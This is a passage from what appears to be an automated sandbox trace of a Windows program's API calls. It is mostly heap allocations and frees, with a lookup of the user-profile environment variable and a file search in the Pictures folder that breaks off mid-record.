hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.875] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0210.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.876] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0210.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.878] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.878] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0210.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0210.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0210.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/mwiYwwD-pGtpU_YSC3.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, 